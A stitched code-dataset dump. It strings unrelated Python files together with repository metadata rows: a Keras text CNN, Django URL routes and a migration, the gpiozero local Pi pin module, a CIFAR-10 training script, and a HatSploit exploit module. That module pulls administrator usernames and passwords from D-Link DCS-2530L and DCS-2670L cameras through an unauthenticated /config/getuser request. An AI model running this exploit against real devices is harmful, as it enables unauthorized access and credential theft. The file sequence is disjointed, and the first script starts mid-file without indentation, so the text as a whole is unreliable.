######################################
### Stem sentences outside of grid ###
######################################
ps = PorterStemmer()
def stem_sentences(sentence):
tokens = sentence.split()
stemmed_tokens = [ps.stem(token) for token in tokens]
return ' '.join(stemmed_tokens)
df['stem_text'] = df['clean_text'].apply(stem_sentences)
#############################################
### Divide into training and testing data ###
#############################################
#sentences = df['stem_text'].values # include stopwords, stemmed
sentences = df['clean_text'] # include stopwords, unstemmed
y = df['just_categories']
tokenizer = Tokenizer()
tokenizer.fit_on_texts(sentences)
sequences = tokenizer.texts_to_sequences(sentences)
word_index = tokenizer.word_index # word and their token # ordered by most frequent
print('Found %s unique tokens.' % len(word_index))
max_words = 5153 # total words of vocabulary we will consider
num_words = [len(words.split()) for words in sentences]
max_seq_len = max(num_words) + 1
from keras.preprocessing.sequence import pad_sequences
text_tok = pad_sequences(sequences, maxlen=max_seq_len+1)
text_tok.shape
np.mean(text_tok > 0)
from keras.utils import to_categorical
encoder = LabelEncoder()
encoder.fit(y)
labels = encoder.transform(y)
num_classes = np.max(labels) + 1
labels = utils.to_categorical(labels, num_classes)
print('Shape of data tensor:', text_tok.shape)
print('Shape of label tensor:', labels.shape)
# split training data into test, validation
x_train, x_test, y_train, y_test = train_test_split(text_tok, labels, test_size=0.2, random_state = 42)
# Prepare embedding matrix
word_vector_dim=100
vocabulary_size= max_words+1
embedding_matrix = np.zeros((vocabulary_size, word_vector_dim))
nb_filters = 64
filter_size_a = 2
drop_rate = 0.5
my_optimizer = 'adam'
from keras.layers import Input, Embedding, Dropout, Conv1D, GlobalMaxPooling1D, Dense, Concatenate, MaxPooling1D, Flatten
from keras.models import Model, load_model
from keras.layers import SpatialDropout1D
my_input = Input(shape=(None,))
embedding = Embedding(input_dim=embedding_matrix.shape[0], input_length=max_seq_len,
output_dim=word_vector_dim, trainable=True,)(my_input)
x = Conv1D(filters = nb_filters, kernel_size = filter_size_a,
activation = 'relu',)(embedding)
x = SpatialDropout1D(drop_rate)(x)
x = MaxPooling1D(pool_size=5)(x)
x = Flatten()(x)
x = Dense(128, activation='relu')(x)
prob = Dense(6, activation = 'softmax',)(x)
model = Model(my_input, prob)
model.compile(loss='categorical_crossentropy', optimizer = my_optimizer,
metrics = ['accuracy'])
model.fit(x_train, y_train, # Target vector
epochs=20, # Three epochs
verbose=1, # No output
batch_size=100, # Number of observations per batch
validation_data=(x_test, y_test))
# add the google embeddings
# Prepare embedding matrix
word_vectors = KeyedVectors.load_word2vec_format(PATH_TO_GV + 'GoogleNews-vectors-negative300.bin', binary=True)
word_vector_dim=300
vocabulary_size= max_words + 1
embedding_matrix = np.zeros((vocabulary_size, word_vector_dim))
for word, i in word_index.items():
if i>=max_words:
continue
try:
embedding_vector = word_vectors[word]
embedding_matrix[i] = embedding_vector
except KeyError:
embedding_matrix[i]=np.random.normal(0,np.sqrt(0.25),word_vector_dim)
len(embedding_matrix)
embedding_matrix.shape
type(embedding_matrix)
nonzero_elements = np.count_nonzero(np.count_nonzero(embedding_matrix, axis=1))
nonzero_elements / max_words
# Setting parameters for the NN
nb_filters = 128
filter_size_a = 3
drop_rate = 0.5
my_optimizer = 'adam'
from keras.layers import Input, Embedding, Dropout, Conv1D, GlobalMaxPooling1D, Dense, Concatenate, MaxPooling1D, Flatten
from keras.models import Model, load_model
## Build the neural network
my_input = Input(shape=(max_seq_len+1,))
embedding = Embedding(input_dim=embedding_matrix.shape[0], # vocab size, including the 0-th word used for padding
output_dim=word_vector_dim,
weights=[embedding_matrix], # we pass our pre-trained embeddings
input_length=max_seq_len+1,
trainable=True
)(my_input)
# Kernel size is how big your window is. Putting x number of words into the NN together at a time from each sentence.
x = Conv1D(filters = nb_filters, kernel_size = filter_size_a,
activation = 'relu',)(embedding)
x = MaxPooling1D(pool_size=5)(x)
x = Flatten()(x)
x = Dense(128, activation='relu')(x)
prob = Dense(6, activation = 'softmax',)(x)
model = Model(my_input, prob)
model.compile(loss='categorical_crossentropy', optimizer = my_optimizer,
metrics = ['accuracy'])
x = model.fit(x_train, y_train, # Target vector
epochs=20, # Three epochs
verbose=1, # No output
batch_size=100, # Number of observations per batch
validation_data=(x_test, y_test))
| 34.7713
| 173
| 0.716404
| true
| true
|
|
1c40c13ce9a777a4ab812a86483389edbb71d4ec
| 867
|
py
|
Python
|
myapp/urls.py
|
srikar7777/Malicious-Urlv5
|
a3a231d60cb6ffc44fdc297bf73683872decd435
|
[
"MIT"
] | 33
|
2020-02-16T08:08:36.000Z
|
2022-03-31T01:01:45.000Z
|
myapp/urls.py
|
Kabeer-Ahmed11/Malicious-Urlv5
|
617b319bfd9a7ed6320abd9e7b90c518064b66cb
|
[
"MIT"
] | 6
|
2020-02-12T06:24:55.000Z
|
2022-02-10T08:21:55.000Z
|
myapp/urls.py
|
Kabeer-Ahmed11/Malicious-Urlv5
|
617b319bfd9a7ed6320abd9e7b90c518064b66cb
|
[
"MIT"
] | 22
|
2020-04-11T07:19:46.000Z
|
2022-03-02T16:59:53.000Z
|
from django.urls import path
from . import views
urlpatterns = [
path('',views.index,name='index'),
path('getuserfeedbackform',views.getuserfeedbackform,name="getuserfeedbackform"),
path('saveuserfeedbackform',views.saveuserfeedbackform,name="saveuserfeedbackform"),
path('api',views.api,name='api'),
path('search',views.search,name="search"),
path('result',views.result,name='result'),
path('about',views.about,name='about'),
path('geturlhistory',views.geturlhistory,name="geturlhistory"),
path('discuss',views.discuss,name="discuss"),
path('reply/<int:replyid>',views.replyform,name="reply"),
path('savereply',views.savereply,name="reply"),
path('searchdiscuss',views.searchdiscuss,name="searchdiscuss"),
path('getdataset',views.getdataset,name='getdataset'),
path('getdocs',views.getdoc,name='namedoc')
]
| 39.409091
| 88
| 0.71511
|
from django.urls import path
from . import views
urlpatterns = [
path('',views.index,name='index'),
path('getuserfeedbackform',views.getuserfeedbackform,name="getuserfeedbackform"),
path('saveuserfeedbackform',views.saveuserfeedbackform,name="saveuserfeedbackform"),
path('api',views.api,name='api'),
path('search',views.search,name="search"),
path('result',views.result,name='result'),
path('about',views.about,name='about'),
path('geturlhistory',views.geturlhistory,name="geturlhistory"),
path('discuss',views.discuss,name="discuss"),
path('reply/<int:replyid>',views.replyform,name="reply"),
path('savereply',views.savereply,name="reply"),
path('searchdiscuss',views.searchdiscuss,name="searchdiscuss"),
path('getdataset',views.getdataset,name='getdataset'),
path('getdocs',views.getdoc,name='namedoc')
]
| true
| true
|
1c40c470aff28eeaa8d9b1f7fa0b8a20f0302121
| 10,796
|
py
|
Python
|
gpiozero/pins/local.py
|
NotBobTheBuilder/gpiozero
|
aeb9d30056ec97e6bf896152e71a870bd0099b4e
|
[
"BSD-3-Clause"
] | 1
|
2021-01-27T21:46:52.000Z
|
2021-01-27T21:46:52.000Z
|
gpiozero/pins/local.py
|
NotBobTheBuilder/gpiozero
|
aeb9d30056ec97e6bf896152e71a870bd0099b4e
|
[
"BSD-3-Clause"
] | null | null | null |
gpiozero/pins/local.py
|
NotBobTheBuilder/gpiozero
|
aeb9d30056ec97e6bf896152e71a870bd0099b4e
|
[
"BSD-3-Clause"
] | null | null | null |
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2016-2019 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2019 Andrew Scheller <github@loowis.durge.org>
# Copyright (c) 2018 Martchus <martchus@gmx.net>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
nstr = str
str = type('')
import io
import errno
import struct
import warnings
from collections import defaultdict
from threading import Lock
try:
from time import monotonic
except ImportError:
from time import time as monotonic
try:
from spidev import SpiDev
except ImportError:
SpiDev = None
from . import SPI
from .pi import PiFactory, PiPin, SPI_HARDWARE_PINS
from .spi import SPISoftwareBus
from ..devices import Device, SharedMixin
from ..output_devices import OutputDevice
from ..exc import DeviceClosed, PinUnknownPi, SPIInvalidClockMode
class LocalPiFactory(PiFactory):
"""
Extends :class:`~gpiozero.pins.pi.PiFactory`. Abstract base class
representing pins attached locally to a Pi. This forms the base class for
local-only pin interfaces (:class:`~gpiozero.pins.rpigpio.RPiGPIOPin`,
:class:`~gpiozero.pins.rpio.RPIOPin`, and
:class:`~gpiozero.pins.native.NativePin`).
"""
pins = {}
_reservations = defaultdict(list)
_res_lock = Lock()
def __init__(self):
super(LocalPiFactory, self).__init__()
self.spi_classes = {
('hardware', 'exclusive'): LocalPiHardwareSPI,
('hardware', 'shared'): LocalPiHardwareSPIShared,
('software', 'exclusive'): LocalPiSoftwareSPI,
('software', 'shared'): LocalPiSoftwareSPIShared,
}
# Override the reservations and pins dict to be this class' attributes.
# This is a bit of a dirty hack, but ensures that anyone evil enough to
# mix pin implementations doesn't try and control the same pin with
# different backends
self.pins = LocalPiFactory.pins
self._reservations = LocalPiFactory._reservations
self._res_lock = LocalPiFactory._res_lock
def _get_revision(self):
revision = None
try:
with io.open('/proc/device-tree/system/linux,revision', 'rb') as f:
revision = hex(struct.unpack(nstr('>L'), f.read(4))[0])[2:]
except IOError as e:
if e.errno != errno.ENOENT:
raise e
with io.open('/proc/cpuinfo', 'r') as f:
for line in f:
if line.startswith('Revision'):
revision = line.split(':')[1].strip().lower()
if revision is not None:
overvolted = revision.startswith('100')
if overvolted:
revision = revision[-4:]
return int(revision, base=16)
raise PinUnknownPi('unable to locate Pi revision in /proc/device-tree or /proc/cpuinfo')
@staticmethod
def ticks():
return monotonic()
@staticmethod
def ticks_diff(later, earlier):
# NOTE: technically the guarantee to always return a positive result
# cannot be maintained in versions where monotonic() is not available
# and we fall back to time(). However, in that situation we've no
# access to a true monotonic source, and no idea how far the clock has
# skipped back so this is the best we can do anyway.
return max(0, later - earlier)
class LocalPiPin(PiPin):
"""
Extends :class:`~gpiozero.pins.pi.PiPin`. Abstract base class representing
a multi-function GPIO pin attached to the local Raspberry Pi.
"""
def _call_when_changed(self, ticks=None, state=None):
"""
Overridden to provide default ticks from the local Pi factory.
.. warning::
The local pin factory uses a seconds-based monotonic value for
its ticks but you *must not* rely upon this behaviour. Ticks are
an opaque value that should only be compared with the associated
:meth:`Factory.ticks_diff` method.
"""
super(LocalPiPin, self)._call_when_changed(
self._factory.ticks() if ticks is None else ticks,
self.state if state is None else state)
class LocalPiHardwareSPI(SPI, Device):
def __init__(self, factory, port, device):
self._port = port
self._device = device
self._interface = None
if SpiDev is None:
raise ImportError('failed to import spidev')
super(LocalPiHardwareSPI, self).__init__()
pins = SPI_HARDWARE_PINS[port]
self.pin_factory.reserve_pins(
self,
pins['clock'],
pins['mosi'],
pins['miso'],
pins['select'][device]
)
self._interface = SpiDev()
self._interface.open(port, device)
self._interface.max_speed_hz = 500000
def close(self):
if self._interface is not None:
self._interface.close()
self._interface = None
self.pin_factory.release_all(self)
super(LocalPiHardwareSPI, self).close()
@property
def closed(self):
return self._interface is None
def __repr__(self):
try:
self._check_open()
return 'SPI(port=%d, device=%d)' % (self._port, self._device)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
"""
Writes data (a list of integer words where each word is assumed to have
:attr:`bits_per_word` bits or less) to the SPI interface, and reads an
equivalent number of words, returning them as a list of integers.
"""
return self._interface.xfer2(data)
def _get_clock_mode(self):
return self._interface.mode
def _set_clock_mode(self, value):
self._interface.mode = value
def _get_lsb_first(self):
return self._interface.lsbfirst
def _set_lsb_first(self, value):
self._interface.lsbfirst = bool(value)
def _get_select_high(self):
return self._interface.cshigh
def _set_select_high(self, value):
self._interface.cshigh = bool(value)
def _get_bits_per_word(self):
return self._interface.bits_per_word
def _set_bits_per_word(self, value):
self._interface.bits_per_word = value
class LocalPiSoftwareSPI(SPI, OutputDevice):
def __init__(self, factory, clock_pin, mosi_pin, miso_pin, select_pin):
self._bus = None
super(LocalPiSoftwareSPI, self).__init__(select_pin, active_high=False)
try:
self._clock_phase = False
self._lsb_first = False
self._bits_per_word = 8
self._bus = SPISoftwareBus(clock_pin, mosi_pin, miso_pin)
except:
self.close()
raise
def _conflicts_with(self, other):
# XXX Need to refine this
return not (
isinstance(other, LocalPiSoftwareSPI) and
(self.pin.number != other.pin.number)
)
def close(self):
if self._bus is not None:
self._bus.close()
self._bus = None
super(LocalPiSoftwareSPI, self).close()
@property
def closed(self):
return self._bus is None
def __repr__(self):
try:
self._check_open()
return 'SPI(clock_pin=%d, mosi_pin=%d, miso_pin=%d, select_pin=%d)' % (
self._bus.clock.pin.number,
self._bus.mosi.pin.number,
self._bus.miso.pin.number,
self.pin.number)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
with self._bus.lock:
self.on()
try:
return self._bus.transfer(
data, self._clock_phase, self._lsb_first, self._bits_per_word)
finally:
self.off()
def _get_clock_mode(self):
with self._bus.lock:
return (not self._bus.clock.active_high) << 1 | self._clock_phase
def _set_clock_mode(self, value):
if not (0 <= value < 4):
raise SPIInvalidClockMode("%d is not a valid clock mode" % value)
with self._bus.lock:
self._bus.clock.active_high = not (value & 2)
self._clock_phase = bool(value & 1)
def _get_lsb_first(self):
return self._lsb_first
def _set_lsb_first(self, value):
self._lsb_first = bool(value)
def _get_bits_per_word(self):
return self._bits_per_word
def _set_bits_per_word(self, value):
if value < 1:
raise ValueError('bits_per_word must be positive')
self._bits_per_word = int(value)
def _get_select_high(self):
return self.active_high
def _set_select_high(self, value):
with self._bus.lock:
self.active_high = value
self.off()
class LocalPiHardwareSPIShared(SharedMixin, LocalPiHardwareSPI):
@classmethod
def _shared_key(cls, factory, port, device):
return (port, device)
class LocalPiSoftwareSPIShared(SharedMixin, LocalPiSoftwareSPI):
@classmethod
def _shared_key(cls, factory, clock_pin, mosi_pin, miso_pin, select_pin):
return (select_pin,)
| 34.602564
| 96
| 0.648388
|
# Copyright (c) 2016-2019 Dave Jones <dave@waveform.org.uk>
# Copyright (c) 2019 Andrew Scheller <github@loowis.durge.org>
# Copyright (c) 2018 Martchus <martchus@gmx.net>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
nstr = str
str = type('')
import io
import errno
import struct
import warnings
from collections import defaultdict
from threading import Lock
try:
from time import monotonic
except ImportError:
from time import time as monotonic
try:
from spidev import SpiDev
except ImportError:
SpiDev = None
from . import SPI
from .pi import PiFactory, PiPin, SPI_HARDWARE_PINS
from .spi import SPISoftwareBus
from ..devices import Device, SharedMixin
from ..output_devices import OutputDevice
from ..exc import DeviceClosed, PinUnknownPi, SPIInvalidClockMode
class LocalPiFactory(PiFactory):
pins = {}
_reservations = defaultdict(list)
_res_lock = Lock()
def __init__(self):
super(LocalPiFactory, self).__init__()
self.spi_classes = {
('hardware', 'exclusive'): LocalPiHardwareSPI,
('hardware', 'shared'): LocalPiHardwareSPIShared,
('software', 'exclusive'): LocalPiSoftwareSPI,
('software', 'shared'): LocalPiSoftwareSPIShared,
}
# Override the reservations and pins dict to be this class' attributes.
# different backends
self.pins = LocalPiFactory.pins
self._reservations = LocalPiFactory._reservations
self._res_lock = LocalPiFactory._res_lock
def _get_revision(self):
revision = None
try:
with io.open('/proc/device-tree/system/linux,revision', 'rb') as f:
revision = hex(struct.unpack(nstr('>L'), f.read(4))[0])[2:]
except IOError as e:
if e.errno != errno.ENOENT:
raise e
with io.open('/proc/cpuinfo', 'r') as f:
for line in f:
if line.startswith('Revision'):
revision = line.split(':')[1].strip().lower()
if revision is not None:
overvolted = revision.startswith('100')
if overvolted:
revision = revision[-4:]
return int(revision, base=16)
raise PinUnknownPi('unable to locate Pi revision in /proc/device-tree or /proc/cpuinfo')
@staticmethod
def ticks():
return monotonic()
@staticmethod
def ticks_diff(later, earlier):
# NOTE: technically the guarantee to always return a positive result
# cannot be maintained in versions where monotonic() is not available
# and we fall back to time(). However, in that situation we've no
return max(0, later - earlier)
class LocalPiPin(PiPin):
def _call_when_changed(self, ticks=None, state=None):
super(LocalPiPin, self)._call_when_changed(
self._factory.ticks() if ticks is None else ticks,
self.state if state is None else state)
class LocalPiHardwareSPI(SPI, Device):
def __init__(self, factory, port, device):
self._port = port
self._device = device
self._interface = None
if SpiDev is None:
raise ImportError('failed to import spidev')
super(LocalPiHardwareSPI, self).__init__()
pins = SPI_HARDWARE_PINS[port]
self.pin_factory.reserve_pins(
self,
pins['clock'],
pins['mosi'],
pins['miso'],
pins['select'][device]
)
self._interface = SpiDev()
self._interface.open(port, device)
self._interface.max_speed_hz = 500000
def close(self):
if self._interface is not None:
self._interface.close()
self._interface = None
self.pin_factory.release_all(self)
super(LocalPiHardwareSPI, self).close()
@property
def closed(self):
return self._interface is None
def __repr__(self):
try:
self._check_open()
return 'SPI(port=%d, device=%d)' % (self._port, self._device)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
return self._interface.xfer2(data)
def _get_clock_mode(self):
return self._interface.mode
def _set_clock_mode(self, value):
self._interface.mode = value
def _get_lsb_first(self):
return self._interface.lsbfirst
def _set_lsb_first(self, value):
self._interface.lsbfirst = bool(value)
def _get_select_high(self):
return self._interface.cshigh
def _set_select_high(self, value):
self._interface.cshigh = bool(value)
def _get_bits_per_word(self):
return self._interface.bits_per_word
def _set_bits_per_word(self, value):
self._interface.bits_per_word = value
class LocalPiSoftwareSPI(SPI, OutputDevice):
def __init__(self, factory, clock_pin, mosi_pin, miso_pin, select_pin):
self._bus = None
super(LocalPiSoftwareSPI, self).__init__(select_pin, active_high=False)
try:
self._clock_phase = False
self._lsb_first = False
self._bits_per_word = 8
self._bus = SPISoftwareBus(clock_pin, mosi_pin, miso_pin)
except:
self.close()
raise
def _conflicts_with(self, other):
return not (
isinstance(other, LocalPiSoftwareSPI) and
(self.pin.number != other.pin.number)
)
def close(self):
if self._bus is not None:
self._bus.close()
self._bus = None
super(LocalPiSoftwareSPI, self).close()
@property
def closed(self):
return self._bus is None
def __repr__(self):
try:
self._check_open()
return 'SPI(clock_pin=%d, mosi_pin=%d, miso_pin=%d, select_pin=%d)' % (
self._bus.clock.pin.number,
self._bus.mosi.pin.number,
self._bus.miso.pin.number,
self.pin.number)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
with self._bus.lock:
self.on()
try:
return self._bus.transfer(
data, self._clock_phase, self._lsb_first, self._bits_per_word)
finally:
self.off()
def _get_clock_mode(self):
with self._bus.lock:
return (not self._bus.clock.active_high) << 1 | self._clock_phase
def _set_clock_mode(self, value):
if not (0 <= value < 4):
raise SPIInvalidClockMode("%d is not a valid clock mode" % value)
with self._bus.lock:
self._bus.clock.active_high = not (value & 2)
self._clock_phase = bool(value & 1)
def _get_lsb_first(self):
return self._lsb_first
def _set_lsb_first(self, value):
self._lsb_first = bool(value)
def _get_bits_per_word(self):
return self._bits_per_word
def _set_bits_per_word(self, value):
if value < 1:
raise ValueError('bits_per_word must be positive')
self._bits_per_word = int(value)
def _get_select_high(self):
return self.active_high
def _set_select_high(self, value):
with self._bus.lock:
self.active_high = value
self.off()
class LocalPiHardwareSPIShared(SharedMixin, LocalPiHardwareSPI):
@classmethod
def _shared_key(cls, factory, port, device):
return (port, device)
class LocalPiSoftwareSPIShared(SharedMixin, LocalPiSoftwareSPI):
@classmethod
def _shared_key(cls, factory, clock_pin, mosi_pin, miso_pin, select_pin):
return (select_pin,)
| true
| true
|
1c40c520d6f4c68d536b05f273f32c0e7d73d9c8
| 2,265
|
py
|
Python
|
hatsploit/modules/exploit/linux/dlink/dcs_credentials_disclosure.py
|
enty8080/HatSplo
|
57ea81c2bc73838cbf7d7062d7e665eda1143d18
|
[
"MIT"
] | 139
|
2021-02-17T15:52:30.000Z
|
2022-03-30T14:50:42.000Z
|
hatsploit/modules/exploit/linux/dlink/dcs_credentials_disclosure.py
|
enty8080/HatSplo
|
57ea81c2bc73838cbf7d7062d7e665eda1143d18
|
[
"MIT"
] | 27
|
2021-03-24T17:14:30.000Z
|
2022-03-02T18:50:43.000Z
|
hatsploit/modules/exploit/linux/dlink/dcs_credentials_disclosure.py
|
enty8080/HatSplo
|
57ea81c2bc73838cbf7d7062d7e665eda1143d18
|
[
"MIT"
] | 85
|
2021-02-17T15:39:03.000Z
|
2022-03-07T09:08:58.000Z
|
#!/usr/bin/env python3
#
# This module requires HatSploit: https://hatsploit.netlify.app
# Current source: https://github.com/EntySec/HatSploit
#
from hatsploit.lib.module import Module
from hatsploit.utils.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
details = {
'Name': "D-Link DCS Credentials Disclosure",
'Module': "exploit/linux/dlink/dcs_credentials_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080) - module developer'
],
'Description': "D-Link DCS-2530L < 1.06.01 and DCS-2670L <= 2.02 credentials disclosure exploit.",
'Platform': "linux",
'Rank': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
if 'name' in response.text and 'pass' in response.text:
username = response.text.split('\n')[0].split('=')[1]
password = response.text.split('\n')[1].split('=')[1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.print_warning("Target vulnerable, but no credentials found.")
def check(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
if not response or response.status_code != 200:
self.print_error("Target is not vulnerable!")
return False
return True
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.print_process(f"Exploiting {remote_host}...")
if not self.check(remote_host, remote_port):
return
self.exploit(remote_host, remote_port)
| 29.415584
| 106
| 0.568212
|
from hatsploit.lib.module import Module
from hatsploit.utils.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
details = {
'Name': "D-Link DCS Credentials Disclosure",
'Module': "exploit/linux/dlink/dcs_credentials_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080) - module developer'
],
'Description': "D-Link DCS-2530L < 1.06.01 and DCS-2670L <= 2.02 credentials disclosure exploit.",
'Platform': "linux",
'Rank': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
if 'name' in response.text and 'pass' in response.text:
username = response.text.split('\n')[0].split('=')[1]
password = response.text.split('\n')[1].split('=')[1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.print_warning("Target vulnerable, but no credentials found.")
def check(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
if not response or response.status_code != 200:
self.print_error("Target is not vulnerable!")
return False
return True
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.print_process(f"Exploiting {remote_host}...")
if not self.check(remote_host, remote_port):
return
self.exploit(remote_host, remote_port)
| true
| true
|
1c40c568ed84a7c5ad953c1385b4f4dfbcd73e5b
| 460
|
py
|
Python
|
councilmatic_core/migrations/0035_bill_html_text.py
|
datamade/django-councilmatic
|
5b074f376667766e4b6dbf093871d294bb35fc51
|
[
"MIT"
] | 26
|
2015-12-05T03:36:49.000Z
|
2022-03-05T12:17:59.000Z
|
councilmatic_core/migrations/0035_bill_html_text.py
|
datamade/django-councilmatic
|
5b074f376667766e4b6dbf093871d294bb35fc51
|
[
"MIT"
] | 181
|
2015-10-14T18:01:19.000Z
|
2021-06-30T13:52:47.000Z
|
councilmatic_core/migrations/0035_bill_html_text.py
|
datamade/django-councilmatic
|
5b074f376667766e4b6dbf093871d294bb35fc51
|
[
"MIT"
] | 18
|
2015-10-22T09:01:24.000Z
|
2020-10-22T19:33:09.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-01-08 16:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('councilmatic_core', '0034_event_guid'),
]
operations = [
migrations.AddField(
model_name='bill',
name='html_text',
field=models.TextField(blank=True, null=True),
),
]
| 21.904762
| 58
| 0.617391
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('councilmatic_core', '0034_event_guid'),
]
operations = [
migrations.AddField(
model_name='bill',
name='html_text',
field=models.TextField(blank=True, null=True),
),
]
| true
| true
|
1c40c5b9cdf2e9fe2acd1666f7d912767d97bb15
| 1,939
|
py
|
Python
|
ch07/train_convnet.py
|
tom01h/deep-learning-from-scratch
|
acb3c31976cd736b4abd21c3e8ab81c3bf0eb9bb
|
[
"MIT"
] | 3
|
2018-10-11T16:19:18.000Z
|
2022-01-16T07:48:06.000Z
|
ch07/train_convnet.py
|
tom01h/deep-learning-from-scratch
|
acb3c31976cd736b4abd21c3e8ab81c3bf0eb9bb
|
[
"MIT"
] | null | null | null |
ch07/train_convnet.py
|
tom01h/deep-learning-from-scratch
|
acb3c31976cd736b4abd21c3e8ab81c3bf0eb9bb
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import sys, os
sys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定
import pickle
import time
import cupy as cp
#import numpy as cp
import numpy as np
import matplotlib.pyplot as plt
from dataset.cifar10 import load_cifar10
from simple_convnet import SimpleConvNet
from common.trainer import Trainer
# データの読み込み
(x_train, t_train), (x_test, t_test) = load_cifar10(normalize=False, flatten=False, one_hot_label=True)
x_train = x_train * 2.0 - 255
x_test = x_test * 2.0 - 255
if os.path.exists("ttarray.pkl"):
with open("ttarray.pkl", 'rb') as f:
t_train = pickle.load(f)
print("Loaded Teacher array!")
# 処理に時間のかかる場合はデータを削減
#train_mask = np.random.choice(x_train.shape[0], 3000)
#x_train = x_train[train_mask]
#t_train = t_train[train_mask]
max_epochs = 25
network = SimpleConvNet(input_dim=(3,32,32),
conv_param = {'filter_num': (32, 32, 64), 'filter_size': 3, 'pad': 1, 'stride': 1},
hidden_size=512, output_size=10, weight_init_std=0.01)
trainer = Trainer(network, x_train, t_train, x_test, t_test,
epochs=max_epochs, mini_batch_size=100,
optimizer='Adam', optimizer_param={'lr': 0.001},
evaluate_sample_num_per_epoch=1000, early_stopping=10)
start = time.time()
trainer.train()
elapsed_time = time.time() - start
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
# パラメータの保存
network.save_params("params.pkl")
print("Saved Network Parameters!")
# グラフの描画
markers = {'train': 'o', 'test': 's'}
x = np.arange(trainer.current_epoch)
plt.plot(x, trainer.train_acc_list, marker='o', label='train', markevery=2)
plt.plot(x, trainer.test_acc_list, marker='s', label='test', markevery=2)
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
np.set_printoptions(threshold=50)
print(np.round(trainer.test_acc_list,3))
| 31.274194
| 107
| 0.687983
|
import sys, os
